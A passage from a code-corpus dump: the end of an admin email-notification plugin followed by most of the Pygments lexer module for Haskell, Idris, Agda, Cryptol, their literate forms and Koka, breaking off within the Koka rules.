plugin.configuration,\n constants.STAFF_ORDER_CONFIRMATION_SUBJECT_FIELD,\n constants.STAFF_ORDER_CONFIRMATION_DEFAULT_SUBJECT,\n )\n send_staff_order_confirmation_email_task.delay(\n recipient_list, payload, config, subject, template\n )\n\n\ndef send_csv_export_failed(payload: dict, config: dict, plugin: \"AdminEmailPlugin\"):\n recipient_email = payload.get(\"recipient_email\")\n if recipient_email:\n template = get_email_template_or_default(\n plugin,\n constants.CSV_EXPORT_FAILED_TEMPLATE_FIELD,\n constants.CSV_EXPORT_FAILED_TEMPLATE_DEFAULT_TEMPLATE,\n constants.DEFAULT_EMAIL_TEMPLATES_PATH,\n )\n subject = get_email_subject(\n plugin.configuration,\n constants.CSV_EXPORT_FAILED_SUBJECT_FIELD,\n constants.CSV_EXPORT_FAILED_DEFAULT_SUBJECT,\n )\n send_export_failed_email_task.delay(\n recipient_email, payload, config, subject, template\n )\n\n\ndef send_staff_reset_password(payload: dict, config: dict, plugin: \"AdminEmailPlugin\"):\n recipient_email = payload.get(\"recipient_email\")\n if recipient_email:\n template = get_email_template_or_default(\n plugin,\n constants.STAFF_PASSWORD_RESET_TEMPLATE_FIELD,\n constants.STAFF_PASSWORD_RESET_DEFAULT_TEMPLATE,\n constants.DEFAULT_EMAIL_TEMPLATES_PATH,\n )\n subject = get_email_subject(\n plugin.configuration,\n constants.STAFF_PASSWORD_RESET_SUBJECT_FIELD,\n constants.STAFF_PASSWORD_RESET_DEFAULT_SUBJECT,\n )\n send_staff_password_reset_email_task.delay(\n recipient_email, payload, config, subject, template\n )\n"} {"ext": "py", "sha": "1a2f221771ff1b30867835352a207e9f01e1e3bd", "content": "# -*- coding: utf-8 -*-\n\"\"\"\n pygments.lexers.haskell\n ~~~~~~~~~~~~~~~~~~~~~~~\n\n Lexers for Haskell and related languages.\n\n :copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.\n :license: BSD, see LICENSE for details.\n\"\"\"\n\nimport re\n\nfrom pygments.lexer import Lexer, RegexLexer, bygroups, do_insertions, \\\n default, include\nfrom pygments.token import Text, Comment, Operator, Keyword, Name, String, \\\n Number, Punctuation, Generic\nfrom pygments import unistring as uni\n\n__all__ = ['HaskellLexer', 'IdrisLexer', 'AgdaLexer', 'CryptolLexer',\n 'LiterateHaskellLexer', 'LiterateIdrisLexer', 'LiterateAgdaLexer',\n 'LiterateCryptolLexer', 'KokaLexer']\n\n\nline_re = re.compile('.*?\\n')\n\n\nclass HaskellLexer(RegexLexer):\n \"\"\"\n A Haskell lexer based on the lexemes defined in the Haskell 98 Report.\n\n .. versionadded:: 0.8\n \"\"\"\n name = 'Haskell'\n aliases = ['haskell', 'hs']\n filenames = ['*.hs']\n mimetypes = ['text/x-haskell']\n\n flags = re.MULTILINE | re.UNICODE\n\n reserved = ('case', 'class', 'data', 'default', 'deriving', 'do', 'else',\n 'family', 'if', 'in', 'infix[lr]?', 'instance',\n 'let', 'newtype', 'of', 'then', 'type', 'where', '_')\n ascii = ('NUL', 'SOH', '[SE]TX', 'EOT', 'ENQ', 'ACK',\n 'BEL', 'BS', 'HT', 'LF', 'VT', 'FF', 'CR', 'S[OI]', 'DLE',\n 'DC[1-4]', 'NAK', 'SYN', 'ETB', 'CAN',\n 'EM', 'SUB', 'ESC', '[FGRU]S', 'SP', 'DEL')\n\n tokens = {\n 'root': [\n # Whitespace:\n (r'\\s+', Text),\n # (r'--\\s*|.*$', Comment.Doc),\n (r'--(?![!#$%&*+./<=>?@^|_~:\\\\]).*?$', Comment.Single),\n (r'\\{-', Comment.Multiline, 'comment'),\n # Lexemes:\n # Identifiers\n (r'\\bimport\\b', Keyword.Reserved, 'import'),\n (r'\\bmodule\\b', Keyword.Reserved, 'module'),\n (r'\\berror\\b', Name.Exception),\n (r'\\b(%s)(?!\\')\\b' % '|'.join(reserved), Keyword.Reserved),\n (r\"'[^\\\\]'\", String.Char), # this has to come before the TH quote\n (r'^[_' + uni.Ll + r'][\\w\\']*', Name.Function),\n (r\"'?[_\" + uni.Ll + r\"][\\w']*\", Name),\n (r\"('')?[\" + uni.Lu + r\"][\\w\\']*\", Keyword.Type),\n (r\"(')[\" + uni.Lu + r\"][\\w\\']*\", Keyword.Type),\n (r\"(')\\[[^\\]]*\\]\", Keyword.Type), # tuples and lists get special treatment in GHC\n (r\"(')\\([^)]*\\)\", Keyword.Type), # ..\n # Operators\n (r'\\\\(?![:!#$%&*+.\\\\/<=>?@^|~-]+)', Name.Function), # lambda operator\n (r'(<-|::|->|=>|=)(?![:!#$%&*+.\\\\/<=>?@^|~-]+)', Operator.Word), # specials\n (r':[:!#$%&*+.\\\\/<=>?@^|~-]*', Keyword.Type), # Constructor operators\n (r'[:!#$%&*+.\\\\/<=>?@^|~-]+', Operator), # Other operators\n # Numbers\n (r'\\d+[eE][+-]?\\d+', Number.Float),\n (r'\\d+\\.\\d+([eE][+-]?\\d+)?', Number.Float),\n (r'0[oO][0-7]+', Number.Oct),\n (r'0[xX][\\da-fA-F]+', Number.Hex),\n (r'\\d+', Number.Integer),\n # Character/String Literals\n (r\"'\", String.Char, 'character'),\n (r'\"', String, 'string'),\n # Special\n (r'\\[\\]', Keyword.Type),\n (r'\\(\\)', Name.Builtin),\n (r'[][(),;`{}]', Punctuation),\n ],\n 'import': [\n # Import statements\n (r'\\s+', Text),\n (r'\"', String, 'string'),\n # after \"funclist\" state\n (r'\\)', Punctuation, '#pop'),\n (r'qualified\\b', Keyword),\n # import X as Y\n (r'([' + uni.Lu + r'][\\w.]*)(\\s+)(as)(\\s+)([' + uni.Lu + r'][\\w.]*)',\n bygroups(Name.Namespace, Text, Keyword, Text, Name), '#pop'),\n # import X hiding (functions)\n (r'([' + uni.Lu + r'][\\w.]*)(\\s+)(hiding)(\\s+)(\\()',\n bygroups(Name.Namespace, Text, Keyword, Text, Punctuation), 'funclist'),\n # import X (functions)\n (r'([' + uni.Lu + r'][\\w.]*)(\\s+)(\\()',\n bygroups(Name.Namespace, Text, Punctuation), 'funclist'),\n # import X\n (r'[\\w.]+', Name.Namespace, '#pop'),\n ],\n 'module': [\n (r'\\s+', Text),\n (r'([' + uni.Lu + r'][\\w.]*)(\\s+)(\\()',\n bygroups(Name.Namespace, Text, Punctuation), 'funclist'),\n (r'[' + uni.Lu + r'][\\w.]*', Name.Namespace, '#pop'),\n ],\n 'funclist': [\n (r'\\s+', Text),\n (r'[' + uni.Lu + r']\\w*', Keyword.Type),\n (r'(_[\\w\\']+|[' + uni.Ll + r'][\\w\\']*)', Name.Function),\n (r'--(?![!#$%&*+./<=>?@^|_~:\\\\]).*?$', Comment.Single),\n (r'\\{-', Comment.Multiline, 'comment'),\n (r',', Punctuation),\n (r'[:!#$%&*+.\\\\/<=>?@^|~-]+', Operator),\n # (HACK, but it makes sense to push two instances, believe me)\n (r'\\(', Punctuation, ('funclist', 'funclist')),\n (r'\\)', Punctuation, '#pop:2'),\n ],\n # NOTE: the next four states are shared in the AgdaLexer; make sure\n # any change is compatible with Agda as well or copy over and change\n 'comment': [\n # Multiline Comments\n (r'[^-{}]+', Comment.Multiline),\n (r'\\{-', Comment.Multiline, '#push'),\n (r'-\\}', Comment.Multiline, '#pop'),\n (r'[-{}]', Comment.Multiline),\n ],\n 'character': [\n # Allows multi-chars, incorrectly.\n (r\"[^\\\\']'\", String.Char, '#pop'),\n (r\"\\\\\", String.Escape, 'escape'),\n (\"'\", String.Char, '#pop'),\n ],\n 'string': [\n (r'[^\\\\\"]+', String),\n (r\"\\\\\", String.Escape, 'escape'),\n ('\"', String, '#pop'),\n ],\n 'escape': [\n (r'[abfnrtv\"\\'&\\\\]', String.Escape, '#pop'),\n (r'\\^[][' + uni.Lu + r'@^_]', String.Escape, '#pop'),\n ('|'.join(ascii), String.Escape, '#pop'),\n (r'o[0-7]+', String.Escape, '#pop'),\n (r'x[\\da-fA-F]+', String.Escape, '#pop'),\n (r'\\d+', String.Escape, '#pop'),\n (r'\\s+\\\\', String.Escape, '#pop'),\n ],\n }\n\n\nclass IdrisLexer(RegexLexer):\n \"\"\"\n A lexer for the dependently typed programming language Idris.\n\n Based on the Haskell and Agda Lexer.\n\n .. versionadded:: 2.0\n \"\"\"\n name = 'Idris'\n aliases = ['idris', 'idr']\n filenames = ['*.idr']\n mimetypes = ['text/x-idris']\n\n reserved = ('case', 'class', 'data', 'default', 'using', 'do', 'else',\n 'if', 'in', 'infix[lr]?', 'instance', 'rewrite', 'auto',\n 'namespace', 'codata', 'mutual', 'private', 'public', 'abstract',\n 'total', 'partial',\n 'let', 'proof', 'of', 'then', 'static', 'where', '_', 'with',\n 'pattern', 'term', 'syntax', 'prefix',\n 'postulate', 'parameters', 'record', 'dsl', 'impossible', 'implicit',\n 'tactics', 'intros', 'intro', 'compute', 'refine', 'exact', 'trivial')\n\n ascii = ('NUL', 'SOH', '[SE]TX', 'EOT', 'ENQ', 'ACK',\n 'BEL', 'BS', 'HT', 'LF', 'VT', 'FF', 'CR', 'S[OI]', 'DLE',\n 'DC[1-4]', 'NAK', 'SYN', 'ETB', 'CAN',\n 'EM', 'SUB', 'ESC', '[FGRU]S', 'SP', 'DEL')\n\n directives = ('lib', 'link', 'flag', 'include', 'hide', 'freeze', 'access',\n 'default', 'logging', 'dynamic', 'name', 'error_handlers', 'language')\n\n tokens = {\n 'root': [\n # Comments\n (r'^(\\s*)(%%%s)' % '|'.join(directives),\n bygroups(Text, Keyword.Reserved)),\n (r'(\\s*)(--(?![!#$%&*+./<=>?@^|_~:\\\\]).*?)$', bygroups(Text, Comment.Single)),\n (r'(\\s*)(\\|{3}.*?)$', bygroups(Text, Comment.Single)),\n (r'(\\s*)(\\{-)', bygroups(Text, Comment.Multiline), 'comment'),\n # Declaration\n (r'^(\\s*)([^\\s(){}]+)(\\s*)(:)(\\s*)',\n bygroups(Text, Name.Function, Text, Operator.Word, Text)),\n # Identifiers\n (r'\\b(%s)(?!\\')\\b' % '|'.join(reserved), Keyword.Reserved),\n (r'(import|module)(\\s+)', bygroups(Keyword.Reserved, Text), 'module'),\n (r\"('')?[A-Z][\\w\\']*\", Keyword.Type),\n (r'[a-z][\\w\\']*', Text),\n # Special Symbols\n (r'(<-|::|->|=>|=)', Operator.Word), # specials\n (r'([(){}\\[\\]:!#$%&*+.\\\\/<=>?@^|~-]+)', Operator.Word), # specials\n # Numbers\n (r'\\d+[eE][+-]?\\d+', Number.Float),\n (r'\\d+\\.\\d+([eE][+-]?\\d+)?', Number.Float),\n (r'0[xX][\\da-fA-F]+', Number.Hex),\n (r'\\d+', Number.Integer),\n # Strings\n (r\"'\", String.Char, 'character'),\n (r'\"', String, 'string'),\n (r'[^\\s(){}]+', Text),\n (r'\\s+?', Text), # Whitespace\n ],\n 'module': [\n (r'\\s+', Text),\n (r'([A-Z][\\w.]*)(\\s+)(\\()',\n bygroups(Name.Namespace, Text, Punctuation), 'funclist'),\n (r'[A-Z][\\w.]*', Name.Namespace, '#pop'),\n ],\n 'funclist': [\n (r'\\s+', Text),\n (r'[A-Z]\\w*', Keyword.Type),\n (r'(_[\\w\\']+|[a-z][\\w\\']*)', Name.Function),\n (r'--.*$', Comment.Single),\n (r'\\{-', Comment.Multiline, 'comment'),\n (r',', Punctuation),\n (r'[:!#$%&*+.\\\\/<=>?@^|~-]+', Operator),\n # (HACK, but it makes sense to push two instances, believe me)\n (r'\\(', Punctuation, ('funclist', 'funclist')),\n (r'\\)', Punctuation, '#pop:2'),\n ],\n # NOTE: the next four states are shared in the AgdaLexer; make sure\n # any change is compatible with Agda as well or copy over and change\n 'comment': [\n # Multiline Comments\n (r'[^-{}]+', Comment.Multiline),\n (r'\\{-', Comment.Multiline, '#push'),\n (r'-\\}', Comment.Multiline, '#pop'),\n (r'[-{}]', Comment.Multiline),\n ],\n 'character': [\n # Allows multi-chars, incorrectly.\n (r\"[^\\\\']\", String.Char),\n (r\"\\\\\", String.Escape, 'escape'),\n (\"'\", String.Char, '#pop'),\n ],\n 'string': [\n (r'[^\\\\\"]+', String),\n (r\"\\\\\", String.Escape, 'escape'),\n ('\"', String, '#pop'),\n ],\n 'escape': [\n (r'[abfnrtv\"\\'&\\\\]', String.Escape, '#pop'),\n (r'\\^[][A-Z@^_]', String.Escape, '#pop'),\n ('|'.join(ascii), String.Escape, '#pop'),\n (r'o[0-7]+', String.Escape, '#pop'),\n (r'x[\\da-fA-F]+', String.Escape, '#pop'),\n (r'\\d+', String.Escape, '#pop'),\n (r'\\s+\\\\', String.Escape, '#pop')\n ],\n }\n\n\nclass AgdaLexer(RegexLexer):\n \"\"\"\n For the `Agda `_\n dependently typed functional programming language and proof assistant.\n\n .. versionadded:: 2.0\n \"\"\"\n\n name = 'Agda'\n aliases = ['agda']\n filenames = ['*.agda']\n mimetypes = ['text/x-agda']\n\n reserved = ['abstract', 'codata', 'coinductive', 'constructor', 'data',\n 'field', 'forall', 'hiding', 'in', 'inductive', 'infix',\n 'infixl', 'infixr', 'instance', 'let', 'mutual', 'open',\n 'pattern', 'postulate', 'primitive', 'private',\n 'quote', 'quoteGoal', 'quoteTerm',\n 'record', 'renaming', 'rewrite', 'syntax', 'tactic',\n 'unquote', 'unquoteDecl', 'using', 'where', 'with']\n\n tokens = {\n 'root': [\n # Declaration\n (r'^(\\s*)([^\\s(){}]+)(\\s*)(:)(\\s*)',\n bygroups(Text, Name.Function, Text, Operator.Word, Text)),\n # Comments\n (r'--(?![!#$%&*+./<=>?@^|_~:\\\\]).*?$', Comment.Single),\n (r'\\{-', Comment.Multiline, 'comment'),\n # Holes\n (r'\\{!', Comment.Directive, 'hole'),\n # Lexemes:\n # Identifiers\n (r'\\b(%s)(?!\\')\\b' % '|'.join(reserved), Keyword.Reserved),\n (r'(import|module)(\\s+)', bygroups(Keyword.Reserved, Text), 'module'),\n (r'\\b(Set|Prop)\\b', Keyword.Type),\n # Special Symbols\n (r'(\\(|\\)|\\{|\\})', Operator),\n (u'(\\\\.{1,3}|\\\\||\\u039B|\\u2200|\\u2192|:|=|->)', Operator.Word),\n # Numbers\n (r'\\d+[eE][+-]?\\d+', Number.Float),\n (r'\\d+\\.\\d+([eE][+-]?\\d+)?', Number.Float),\n (r'0[xX][\\da-fA-F]+', Number.Hex),\n (r'\\d+', Number.Integer),\n # Strings\n (r\"'\", String.Char, 'character'),\n (r'\"', String, 'string'),\n (r'[^\\s(){}]+', Text),\n (r'\\s+?', Text), # Whitespace\n ],\n 'hole': [\n # Holes\n (r'[^!{}]+', Comment.Directive),\n (r'\\{!', Comment.Directive, '#push'),\n (r'!\\}', Comment.Directive, '#pop'),\n (r'[!{}]', Comment.Directive),\n ],\n 'module': [\n (r'\\{-', Comment.Multiline, 'comment'),\n (r'[a-zA-Z][\\w.]*', Name, '#pop'),\n (r'[\\W0-9_]+', Text)\n ],\n 'comment': HaskellLexer.tokens['comment'],\n 'character': HaskellLexer.tokens['character'],\n 'string': HaskellLexer.tokens['string'],\n 'escape': HaskellLexer.tokens['escape']\n }\n\n\nclass CryptolLexer(RegexLexer):\n \"\"\"\n FIXME: A Cryptol2 lexer based on the lexemes defined in the Haskell 98 Report.\n\n .. versionadded:: 2.0\n \"\"\"\n name = 'Cryptol'\n aliases = ['cryptol', 'cry']\n filenames = ['*.cry']\n mimetypes = ['text/x-cryptol']\n\n reserved = ('Arith', 'Bit', 'Cmp', 'False', 'Inf', 'True', 'else',\n 'export', 'extern', 'fin', 'if', 'import', 'inf', 'lg2',\n 'max', 'min', 'module', 'newtype', 'pragma', 'property',\n 'then', 'type', 'where', 'width')\n ascii = ('NUL', 'SOH', '[SE]TX', 'EOT', 'ENQ', 'ACK',\n 'BEL', 'BS', 'HT', 'LF', 'VT', 'FF', 'CR', 'S[OI]', 'DLE',\n 'DC[1-4]', 'NAK', 'SYN', 'ETB', 'CAN',\n 'EM', 'SUB', 'ESC', '[FGRU]S', 'SP', 'DEL')\n\n tokens = {\n 'root': [\n # Whitespace:\n (r'\\s+', Text),\n # (r'--\\s*|.*$', Comment.Doc),\n (r'//.*$', Comment.Single),\n (r'/\\*', Comment.Multiline, 'comment'),\n # Lexemes:\n # Identifiers\n (r'\\bimport\\b', Keyword.Reserved, 'import'),\n (r'\\bmodule\\b', Keyword.Reserved, 'module'),\n (r'\\berror\\b', Name.Exception),\n (r'\\b(%s)(?!\\')\\b' % '|'.join(reserved), Keyword.Reserved),\n (r'^[_a-z][\\w\\']*', Name.Function),\n (r\"'?[_a-z][\\w']*\", Name),\n (r\"('')?[A-Z][\\w\\']*\", Keyword.Type),\n # Operators\n (r'\\\\(?![:!#$%&*+.\\\\/<=>?@^|~-]+)', Name.Function), # lambda operator\n (r'(<-|::|->|=>|=)(?![:!#$%&*+.\\\\/<=>?@^|~-]+)', Operator.Word), # specials\n (r':[:!#$%&*+.\\\\/<=>?@^|~-]*', Keyword.Type), # Constructor operators\n (r'[:!#$%&*+.\\\\/<=>?@^|~-]+', Operator), # Other operators\n # Numbers\n (r'\\d+[eE][+-]?\\d+', Number.Float),\n (r'\\d+\\.\\d+([eE][+-]?\\d+)?', Number.Float),\n (r'0[oO][0-7]+', Number.Oct),\n (r'0[xX][\\da-fA-F]+', Number.Hex),\n (r'\\d+', Number.Integer),\n # Character/String Literals\n (r\"'\", String.Char, 'character'),\n (r'\"', String, 'string'),\n # Special\n (r'\\[\\]', Keyword.Type),\n (r'\\(\\)', Name.Builtin),\n (r'[][(),;`{}]', Punctuation),\n ],\n 'import': [\n # Import statements\n (r'\\s+', Text),\n (r'\"', String, 'string'),\n # after \"funclist\" state\n (r'\\)', Punctuation, '#pop'),\n (r'qualified\\b', Keyword),\n # import X as Y\n (r'([A-Z][\\w.]*)(\\s+)(as)(\\s+)([A-Z][\\w.]*)',\n bygroups(Name.Namespace, Text, Keyword, Text, Name), '#pop'),\n # import X hiding (functions)\n (r'([A-Z][\\w.]*)(\\s+)(hiding)(\\s+)(\\()',\n bygroups(Name.Namespace, Text, Keyword, Text, Punctuation), 'funclist'),\n # import X (functions)\n (r'([A-Z][\\w.]*)(\\s+)(\\()',\n bygroups(Name.Namespace, Text, Punctuation), 'funclist'),\n # import X\n (r'[\\w.]+', Name.Namespace, '#pop'),\n ],\n 'module': [\n (r'\\s+', Text),\n (r'([A-Z][\\w.]*)(\\s+)(\\()',\n bygroups(Name.Namespace, Text, Punctuation), 'funclist'),\n (r'[A-Z][\\w.]*', Name.Namespace, '#pop'),\n ],\n 'funclist': [\n (r'\\s+', Text),\n (r'[A-Z]\\w*', Keyword.Type),\n (r'(_[\\w\\']+|[a-z][\\w\\']*)', Name.Function),\n # TODO: these don't match the comments in docs, remove.\n #(r'--(?![!#$%&*+./<=>?@^|_~:\\\\]).*?$', Comment.Single),\n #(r'{-', Comment.Multiline, 'comment'),\n (r',', Punctuation),\n (r'[:!#$%&*+.\\\\/<=>?@^|~-]+', Operator),\n # (HACK, but it makes sense to push two instances, believe me)\n (r'\\(', Punctuation, ('funclist', 'funclist')),\n (r'\\)', Punctuation, '#pop:2'),\n ],\n 'comment': [\n # Multiline Comments\n (r'[^/*]+', Comment.Multiline),\n (r'/\\*', Comment.Multiline, '#push'),\n (r'\\*/', Comment.Multiline, '#pop'),\n (r'[*/]', Comment.Multiline),\n ],\n 'character': [\n # Allows multi-chars, incorrectly.\n (r\"[^\\\\']'\", String.Char, '#pop'),\n (r\"\\\\\", String.Escape, 'escape'),\n (\"'\", String.Char, '#pop'),\n ],\n 'string': [\n (r'[^\\\\\"]+', String),\n (r\"\\\\\", String.Escape, 'escape'),\n ('\"', String, '#pop'),\n ],\n 'escape': [\n (r'[abfnrtv\"\\'&\\\\]', String.Escape, '#pop'),\n (r'\\^[][A-Z@^_]', String.Escape, '#pop'),\n ('|'.join(ascii), String.Escape, '#pop'),\n (r'o[0-7]+', String.Escape, '#pop'),\n (r'x[\\da-fA-F]+', String.Escape, '#pop'),\n (r'\\d+', String.Escape, '#pop'),\n (r'\\s+\\\\', String.Escape, '#pop'),\n ],\n }\n\n EXTRA_KEYWORDS = set(('join', 'split', 'reverse', 'transpose', 'width',\n 'length', 'tail', '<<', '>>', '<<<', '>>>', 'const',\n 'reg', 'par', 'seq', 'ASSERT', 'undefined', 'error',\n 'trace'))\n\n def get_tokens_unprocessed(self, text):\n stack = ['root']\n for index, token, value in \\\n RegexLexer.get_tokens_unprocessed(self, text, stack):\n if token is Name and value in self.EXTRA_KEYWORDS:\n yield index, Name.Builtin, value\n else:\n yield index, token, value\n\n\nclass LiterateLexer(Lexer):\n \"\"\"\n Base class for lexers of literate file formats based on LaTeX or Bird-style\n (prefixing each code line with \">\").\n\n Additional options accepted:\n\n `litstyle`\n If given, must be ``\"bird\"`` or ``\"latex\"``. If not given, the style\n is autodetected: if the first non-whitespace character in the source\n is a backslash or percent character, LaTeX is assumed, else Bird.\n \"\"\"\n\n bird_re = re.compile(r'(>[ \\t]*)(.*\\n)')\n\n def __init__(self, baselexer, **options):\n self.baselexer = baselexer\n Lexer.__init__(self, **options)\n\n def get_tokens_unprocessed(self, text):\n style = self.options.get('litstyle')\n if style is None:\n style = (text.lstrip()[0:1] in '%\\\\') and 'latex' or 'bird'\n\n code = ''\n insertions = []\n if style == 'bird':\n # bird-style\n for match in line_re.finditer(text):\n line = match.group()\n m = self.bird_re.match(line)\n if m:\n insertions.append((len(code),\n [(0, Comment.Special, m.group(1))]))\n code += m.group(2)\n else:\n insertions.append((len(code), [(0, Text, line)]))\n else:\n # latex-style\n from pygments.lexers.markup import TexLexer\n lxlexer = TexLexer(**self.options)\n codelines = 0\n latex = ''\n for match in line_re.finditer(text):\n line = match.group()\n if codelines:\n if line.lstrip().startswith('\\\\end{code}'):\n codelines = 0\n latex += line\n else:\n code += line\n elif line.lstrip().startswith('\\\\begin{code}'):\n codelines = 1\n latex += line\n insertions.append((len(code),\n list(lxlexer.get_tokens_unprocessed(latex))))\n latex = ''\n else:\n latex += line\n insertions.append((len(code),\n list(lxlexer.get_tokens_unprocessed(latex))))\n for item in do_insertions(insertions, self.baselexer.get_tokens_unprocessed(code)):\n yield item\n\n\nclass LiterateHaskellLexer(LiterateLexer):\n \"\"\"\n For Literate Haskell (Bird-style or LaTeX) source.\n\n Additional options accepted:\n\n `litstyle`\n If given, must be ``\"bird\"`` or ``\"latex\"``. If not given, the style\n is autodetected: if the first non-whitespace character in the source\n is a backslash or percent character, LaTeX is assumed, else Bird.\n\n .. versionadded:: 0.9\n \"\"\"\n name = 'Literate Haskell'\n aliases = ['lhs', 'literate-haskell', 'lhaskell']\n filenames = ['*.lhs']\n mimetypes = ['text/x-literate-haskell']\n\n def __init__(self, **options):\n hslexer = HaskellLexer(**options)\n LiterateLexer.__init__(self, hslexer, **options)\n\n\nclass LiterateIdrisLexer(LiterateLexer):\n \"\"\"\n For Literate Idris (Bird-style or LaTeX) source.\n\n Additional options accepted:\n\n `litstyle`\n If given, must be ``\"bird\"`` or ``\"latex\"``. If not given, the style\n is autodetected: if the first non-whitespace character in the source\n is a backslash or percent character, LaTeX is assumed, else Bird.\n\n .. versionadded:: 2.0\n \"\"\"\n name = 'Literate Idris'\n aliases = ['lidr', 'literate-idris', 'lidris']\n filenames = ['*.lidr']\n mimetypes = ['text/x-literate-idris']\n\n def __init__(self, **options):\n hslexer = IdrisLexer(**options)\n LiterateLexer.__init__(self, hslexer, **options)\n\n\nclass LiterateAgdaLexer(LiterateLexer):\n \"\"\"\n For Literate Agda source.\n\n Additional options accepted:\n\n `litstyle`\n If given, must be ``\"bird\"`` or ``\"latex\"``. If not given, the style\n is autodetected: if the first non-whitespace character in the source\n is a backslash or percent character, LaTeX is assumed, else Bird.\n\n .. versionadded:: 2.0\n \"\"\"\n name = 'Literate Agda'\n aliases = ['lagda', 'literate-agda']\n filenames = ['*.lagda']\n mimetypes = ['text/x-literate-agda']\n\n def __init__(self, **options):\n agdalexer = AgdaLexer(**options)\n LiterateLexer.__init__(self, agdalexer, litstyle='latex', **options)\n\n\nclass LiterateCryptolLexer(LiterateLexer):\n \"\"\"\n For Literate Cryptol (Bird-style or LaTeX) source.\n\n Additional options accepted:\n\n `litstyle`\n If given, must be ``\"bird\"`` or ``\"latex\"``. If not given, the style\n is autodetected: if the first non-whitespace character in the source\n is a backslash or percent character, LaTeX is assumed, else Bird.\n\n .. versionadded:: 2.0\n \"\"\"\n name = 'Literate Cryptol'\n aliases = ['lcry', 'literate-cryptol', 'lcryptol']\n filenames = ['*.lcry']\n mimetypes = ['text/x-literate-cryptol']\n\n def __init__(self, **options):\n crylexer = CryptolLexer(**options)\n LiterateLexer.__init__(self, crylexer, **options)\n\n\nclass KokaLexer(RegexLexer):\n \"\"\"\n Lexer for the `Koka `_\n language.\n\n .. versionadded:: 1.6\n \"\"\"\n\n name = 'Koka'\n aliases = ['koka']\n filenames = ['*.kk', '*.kki']\n mimetypes = ['text/x-koka']\n\n keywords = [\n 'infix', 'infixr', 'infixl',\n 'type', 'cotype', 'rectype', 'alias',\n 'struct', 'con',\n 'fun', 'function', 'val', 'var',\n 'external',\n 'if', 'then', 'else', 'elif', 'return', 'match',\n 'private', 'public', 'private',\n 'module', 'import', 'as',\n 'include', 'inline',\n 'rec',\n 'try', 'yield', 'enum',\n 'interface', 'instance',\n ]\n\n # keywords that are followed by a type\n typeStartKeywords = [\n 'type', 'cotype', 'rectype', 'alias', 'struct', 'enum',\n ]\n\n # keywords valid in a type\n typekeywords = [\n 'forall', 'exists', 'some', 'with',\n ]\n\n # builtin names and special names\n builtin = [\n 'for', 'while', 'repeat',\n 'foreach', 'foreach-indexed',\n 'error', 'catch', 'finally',\n 'cs', 'js', 'file', 'ref', 'assigned',\n ]\n\n # symbols that can be in an operator\n symbols = r'[$%&*+@!/\\\\^~=.:\\-?|<>]+'\n\n # symbol boundary: an operator keyword should not be followed by any of these\n sboundary = '(?!'+symbols+')'\n\n # name boundary: a keyword should not be followed by any of these\n boundary = '(?![\\w/])'\n\n # koka token abstractions\n tokenType = Name.Attribute\n tokenTypeDef = Name.Class\n tokenConstructor = Generic.Emph\n\n # main lexer\n tokens = {\n 'root': [\n include('whitespace'),\n\n # go into type mode\n (r'::?' + sboundary, tokenType, 'type'),\n (r'(alias)(\\s+)([a-z]\\w*)?', bygroups(Keyword, Text, tokenTypeDef),\n 'alias-type'),\n (r'(struct)(\\s+)([a-z]\\w*)?', bygroups(Keyword, Text, tokenTypeDef),\n 'struct-type'),\n ((r'(%s)' % '|'.join(typeStartKeywords)) +\n r'(\\s+)([a-z]\\w*)?', bygroups(Keyword, Text, tokenTypeDef),\n 'type'),\n\n # special sequences of tokens (we use ?: for non-capturing group as\n # required by 'bygroups')\n (r'(module)(\\s+)(interface\\s+)?((?:[a-z]\\w*/)*[a-z]\\w*)',\n bygroups(Keyword, Text, Keyword, Name.Namespace)),\n (r'(import)(\\s+)((?:[a-z]\\w*/)*[a-z]\\w*)'\n r'(?:(\\s*)(=)(\\s*)((?:qualified\\s*)?)'\n r'((?:[a-z]\\w*/)*[a-z]\\w*))?',\n bygroups(Keyword, Text, Name.Namespace, Text, Keyword, Text,\n Keyword, Name.Namespace)),\n\n (r'(^(?:(?:public|private)\\s*)?(?:function|fun|val))'\n r'(\\s+)([a-z]\\w*|\\((?:' + symbols + r'|/)\\))',\n bygroups(Keyword, Text, Name.Function)),\n (r'(^(?:(?:public|private)\\s*)?external)(\\s+)(inline\\s+)?'\n r'([a-z]\\w*|\\((?:' + symbols + r'|/)\\))',\n bygroups(Keyword, Text, Keyword, Name.Function)),\n\n # keywords\n (r'(%s)' % '|'.join(typekeywords) + boundary, Keyword.Type),\n (r'(%s)' % '|'.join(keywords) + boundary, Keyword),\n (r'(%s)' % '|'.join(builtin) + boundary, Keyword.Pseudo),\n (r'::?|:=|\\->|[=.]' + sboundary, Keyword),\n\n # names\n (r'((?:[a-z]\\w*/)*)([A-Z]\\w*)',\n bygroups(Name.Namespace, tokenConstructor)),\n (r'((?:[a-z]\\w*/)*)([a-z]\\w*)', bygroups(Name.Namespace, Name)),\n (r'((?:[a-z]\\w*/)*)(\\((?:' + symbols + r'|/)\\))',\n bygroups(Name.Namespace, Name)),\n (r'_\\w*', Name.Variable),\n\n # literal string\n (r'@\"', String.Double, 'litstring'),\n\n # operators\n (symbols + \"|/(?![*/])\", Operator),\n (r'`', Operator),\n (r'[{}()\\[\\];,]', Punctuation),\n\n # literals. No check for literal characters with len > 1\n (r'[0-9]+\\.[0-9]+([eE][\\-+]?[0-9]+)?', Number.Float),\n (r'0[xX][0-9a-fA-F]+', Number.Hex),\n (r'[0-9]+', Number.Integer),\n\n (r\"'\", String.Char, 'char'),\n (r'\"', String.Double, 'string'),\n ],\n\n # type started by alias\n 'alias-type': [\n (r'=', Keyword),\n include('type')\n ],\n\n # type started by struct\n 'struct-type': [\n (r'(?=\\((?!,*\\)))', Punctuation, '#pop'),\n include('type')\n ],\n\n # type started by colon\n 'type': [\n (r'[(\\[<]', tokenType, 'type-nested'),\n include('type-content')\n ],\n\n # type nested in brackets: can contain parameters, comma etc.\n 'type-nested': [\n (r'[)\\]>]', tokenType, '#pop'),\n (r'[(\\[<]', tokenType, 'type-nested'),\n (r',', tokenType),\n (r'([a-z]\\w*)(\\s*)(:)(?!:)',\n bygroups(Name, Text, tokenType)), # parameter name\n include('type-content')\n ],\n\n # shared contents of a type\n 'type-content': [\n include('whitespace'),\n\n # keywords\n (r'(%s)' % '|'.join(typekeywords) + boundary, Keyword),\n (r'(?=((%s)' % '|'.join(keywords) + boundary + '))',\n Keyword, '#pop'), # need to match because names overlap...\n\n # kinds\n (r'[EPHVX]' + boundary, tokenType),\n\n # type names\n (r'[a-z][0-9]*(?![\\w/])', tokenType),\n (r'_\\w*', tokenType.Variable), # Generic.Emph\n 